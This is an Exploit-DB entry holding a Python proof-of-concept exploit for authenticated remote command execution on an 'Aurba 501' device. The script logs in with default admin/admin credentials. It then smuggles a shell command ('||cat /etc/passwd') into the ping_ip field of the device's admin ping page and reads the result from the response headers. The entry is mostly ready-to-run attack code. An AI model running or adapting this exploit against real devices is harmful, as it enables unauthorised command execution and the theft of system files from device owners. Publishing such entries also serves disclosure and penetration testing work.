Aurba 501 - Authenticated RCE

EDB-ID:

52074

CVE:

N/A

EDB Verified:

Author:

Hosein Vita

Type:

webapps

Exploit:   /  

Platform:

Linux

Date:

2024-08-24

Vulnerable App: 
# Exploit Title: Remote Command Execution | Aurba 501
# Date: 17-07-2024
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.hpe.com
# Version: Aurba 501 CN12G5W0XX
# Tested on: Linux

import requests
from requests.auth import HTTPBasicAuth


def get_input(prompt, default_value):
    user_input = input(prompt)
    return user_input if user_input else default_value


base_url = input("Enter the base URL: ")
if not base_url:
    print("Base URL is required.")
    exit(1)

username = get_input("Enter the username (default: admin): ", "admin")
password = get_input("Enter the password (default: admin): ", "admin")


login_url = f"{base_url}/login.cgi"
login_payload = {
    "username": username,
    "password": password,
    "login": "Login"
}


login_headers = {
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": base_url,
    "Connection": "close"
}

session = requests.Session()


requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Login to the system
response = session.post(login_url, headers=login_headers, data=login_payload, verify=False)

# Check if login was successful
if response.status_code == 200 and "login failed" not in response.text.lower():
    print("Login successful!")
    
    # The command to be executed on the device
    command = "cat /etc/passwd"
    
    
    ping_ip = f"4.2.2.4||{command}"
    
    # Data to be sent in the POST request
    data = {
        "ping_ip": ping_ip,
        "ping_timeout": "1",
        "textareai": "",
        "ping_start": "Ping"
    }
    
    # Headers to be sent with the request
    headers = {
        "Accept-Encoding": "gzip, deflate, br",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": base_url,
        "Referer": f"{base_url}/admin.cgi?action=ping",
        "Connection": "close"
    }
    
    # Sending the HTTP POST request to exploit the vulnerability
    exploit_url = f"{base_url}/admin.cgi?action=ping"
    response = session.post(exploit_url, headers=headers, data=data, verify=False)
    
    
    if any("root" in value for value in response.headers.values()):
        print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")
        print(response.headers)
    else:
        print("Exploit failed. The response headers did not contain the expected output.")
else:
    print("Login failed. Please check the credentials and try again.")

# Print the response headers for further analysis
print(response.headers)
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services